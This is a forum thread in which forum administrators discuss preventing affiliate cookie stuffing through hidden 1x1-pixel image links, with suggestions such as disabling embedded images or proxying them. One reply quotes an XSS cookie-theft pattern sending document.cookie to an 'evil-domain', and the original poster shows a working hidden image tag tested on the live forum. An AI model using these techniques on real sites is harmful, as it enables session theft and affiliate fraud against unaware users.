Skip to main content
Topic: Cookie Stuffing - how to avoid it. (Read 6346 times) previous topic - next topic - Topic derived from ILA in message previews is (s...
0 Members and 1 Guest are viewing this topic.

Cookie Stuffing - how to avoid it.

How can we avoid that users are posting 1x1 pixel wide http links  instead of images,
so that they are not cookie stuffing the forum ?

Cookie Stuffing works this way, that normal http links are posted inside an Image tag
so the browser calls up this link and fetches the Cookie from the destination site and
then no image is displayed and thus they make it only 1 x 1 pixel big, so that it does not
look suspicious...

How can this be stopped, also in [img] tag and in avatars loaded from external sites ?
Many thanks.

Re: something

Reply #1

How can we avoid that users hijack each and every topic?
Bugs creator.
Features destroyer.
Template killer.

Re: Cookie Stuffing - how to avoid it.

Reply #2

Never  :( but .. 2fa login/register helps a little bit   ;)

Fel

Many are stubborn in relation to the path, a few in relation to the target.
Visit our new Forum Project on https://www.portamx.com

Re: Cookie Stuffing - how to avoid it.

Reply #3

Quote from: hartiberlin – Cookie Stuffing works this way, that normal http links are posted inside an Image tag ...
Step 1 .. use https
Step 2 .. set cookies to secure and https
Step 3 .. use 2FA login / register

That will helps a little bit  ;)


Many are stubborn in relation to the path, a few in relation to the target.
Visit our new Forum Project on https://www.portamx.com

Re: Cookie Stuffing - how to avoid it.

Reply #4

Hmm, how does the 2 Factor Authentication can stop this ?
This is only for the login of the member, but he could still be posting
http links inside an image [img] tag, right ?

Re: Cookie Stuffing - how to avoid it.

Reply #5

I may be terribly wrong, but as far as I know, unless a bug in the browser, an embedded image cannot sniff the cookies because they reside on two different domains and cookies are domain specific.
You need at least to be able to run javascript to sniff the session data, embedded images are generally not enough from what I know.
Bugs creator.
Features destroyer.
Template killer.

Re: Cookie Stuffing - how to avoid it.

Reply #6

Also you can disable images in the posts .. (simple disable the BBC img tag in the settings).
If a user will add a image, he can upload it and insert this as attach. So this image is local stored.
Many are stubborn in relation to the path, a few in relation to the target.
Visit our new Forum Project on https://www.portamx.com

Re: Cookie Stuffing - how to avoid it.

Reply #7

Quote from: hartiberlin – Hmm, how does the 2 Factor Authentication can stop this ?
That do not stops any criminal activity .. but .. I think, that such users do not have a accout they can handle 2FA  ;)
Many are stubborn in relation to the path, a few in relation to the target.
Visit our new Forum Project on https://www.portamx.com


Re: Cookie Stuffing - how to avoid it.

Reply #9

You meam a way to mitigate a problem that doesn't exist, or you mean the cache proxy could be exploited to send cookie data back?
Bugs creator.
Features destroyer.
Template killer.

Re: Cookie Stuffing - how to avoid it.

Reply #10

Cookies can only be set and read on the domain the browser retrieves data from. The OP is clearly talking about preventing third-party tracking cookies (hence "stuffing," not "sniffing"), which as a problem is perfectly possible in a regular bog-standard HTTP environment. I hadn't encountered the specific term before, but Wikipedia explains it thus:

QuoteOn the World Wide Web, cookie stuffing (also cookie dropping) is an affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target.

I don't know if this is actually something to worry about, but all you have to do to test it is to copy the php setcookie() example into a PHP file, stick <img src="the-different-domain-with-setcookie.php"> in an HTML file, load it, and check if the cookie exists on the-different-domain. Unless you've disabled third-party cookies, it will.

You're talking about something like XSS session hijacking, which is completely unrelated except in the sense that you could use image.src = evil-domain + document.cookie in a script to do it. To prevent that in case of script injection, use HttpOnly, preferably combined with HTTPS. But like I said, that's off topic. This is about tracking cookies.

Edit:
Quoting what I wrote above:
QuoteUnless you've disabled third-party cookies, it will.
Of course you'll need to add an image mimetype and some image data if you want to display an actual 1x1 px image as opposed to a nice broken image icon. Presumably a transparent GIF would be your best bet. My point was that you can perform the basic proof of concept in seconds.

Edit 2: fully worked out example here, including a full description of the problem (described as an opportunity). Of course not everything applies because our forum won't request resources other than the one specific image from the server:

Quote Once the third-party cookie system is in place, it can be made to do something useful. For example:

When the third-party cookie is set any content can be sent to the web page with appropriate HTML tags. Image, JavaScript, Flash, HTML ads, anything that can be published on a web page. [The ad thing might apply, but in that case the actual ads would already be doing the tracking cookie job in the first place.]

The cookie setting can be logged, along with any other information available at the time, including referring web page and domain, and including any other information the HTML tag provided. [This obviously applies.]

Date and time can be recorded. Ad identification can be recorded. [Sure.]

Cookies previously set can be read and the cookie's value adjusted. [Yup.]

There are ways to work around third-party cookie restrictions some browsers make available to their users. [Not without participation from both domains.]

The limit of what can be done may be determined by the limit of what can be imagined. [Not to worry about that one; again not without participation from all domains involved.]
Last Edit: February 07, 2018, 11:14:07 am by Frenzie

Re: Cookie Stuffing - how to avoid it.

Reply #11

Quote from: Frenzie – Cookies can only be set and read on the domain the browser retrieves data from. The OP is clearly talking about preventing third-party tracking cookies (hence "stuffing," not "sniffing"), which as a problem is perfectly possible in a regular bog-standard HTTP environment. I hadn't encountered the specific term before, but Wikipedia explains it thus:

QuoteOn the World Wide Web, cookie stuffing (also cookie dropping) is an affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target.


Yes, I meant this regarding affiliate cookies stuffing, e.g. Amzon or Ebay or Clickbank cookies for instance...
Hiding them in an Image Tag can set them in the userĀ“s browser although he never visited Amazon for instance..
Then when he visits himself Amazon and makes a purchase, the Cookie Stuffer gets the commission for the sale...
I want to prevent this being done by users in my forum.
Many thanks.
Regards, Stefan.

Re: Cookie Stuffing - how to avoid it.

Reply #12

Sorry, I thought it was a typo.
You get pretty nasty users there.
Disable any embedding and you are safe.
Enable https and image cache and you should be safe.
Bugs creator.
Features destroyer.
Template killer.

Re: Cookie Stuffing - how to avoid it.

Reply #13

Well Elkarte.net is also vulnerable to cookie stuffing.

I just tested it and it went through.
See:
https://www.elkarte.net/community/index.php?topic=5272.msg37525#msg37525

Mark all the text there in this posting and rightlick in Firefox
and click "Show Sourcecode of marked selection."

There you wil see the img src tag with a https link just to google.de
and nobody knows, that it is there...
This way you can also set Affiliate cookies without anybody knowing...
So the admins here should better deactivate this function on Elkarte.net !

Re: Cookie Stuffing - how to avoid it.

Reply #14

Code: [Select]
<img src="https://google.de" alt="" style="width: 100%; max-width: 20px; max-height: 1px; cursor: pointer;" class="bbc_img resized">


The mentioned posting
https://www.elkarte.net/community/index.php?topic=5272.msg37525#msg37525
now contains this and this way a Cookie from Google will be set into your browser...